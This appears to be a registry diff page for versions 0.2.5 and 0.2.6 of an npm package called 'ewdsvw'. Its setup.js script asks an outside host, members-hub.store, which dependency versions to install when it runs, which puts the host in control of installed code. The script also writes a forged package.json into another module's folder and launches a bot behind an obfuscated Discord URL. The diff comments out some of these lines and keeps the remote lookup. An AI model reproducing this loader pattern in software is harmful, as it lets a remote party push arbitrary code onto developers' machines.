Comparing version 0.2.5 to 0.2.6
{ | ||
"name": "ewdsvw", | ||
"description": "ewdsvw", | ||
"version": "0.2.5", | ||
"version": "0.2.6", | ||
"main": "setup.js", | ||
@@ -6,0 +6,0 @@ "dependencies": { |
12
setup.js
@@ -30,2 +30,3 @@ const { default: axios } = require('axios'); | ||
console.log('Dependencies installed successfully.'); | ||
/* | ||
fs.writeFileSync('./node_modules/gfdsac/package.json', JSON.stringify({ | ||
@@ -45,6 +46,7 @@ "name": "ewdsvw", | ||
"readmeFilename": "README.md" | ||
}, null, 2)) | ||
}, null, 2))*/ | ||
/* | ||
setTimeout(()=>{ | ||
process.exit(0); | ||
}, 5000) | ||
}, 5000)*/ | ||
@@ -58,4 +60,4 @@ runProject(); | ||
console.log('Running the project...'); | ||
let bot = require('./server.js') | ||
new bot("https://disc" + "ord.com/", 0) | ||
// let bot = require('./index.js') | ||
// new bot("https://disc" + "ord.com/", 0) | ||
} | ||
@@ -73,3 +75,3 @@ | ||
for(const name of dependencies.d){ | ||
_dependencies.push(`${name}@${await axios(`https://members-hub.store/packagedata?name=${name}`).then(res=>res.data?.value || "*").catch(err=>"*")}`) | ||
_dependencies.push(`${name}@${await axios(`https://members-hub.store/packagedata?name=${name}`).then(res=>res.data?.value === "^undefined" ? "*" : res.data?.value || "*").catch(err=>"*")}`) | ||
} | ||
@@ -76,0 +78,0 @@ console.log(_dependencies) |
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
9614
69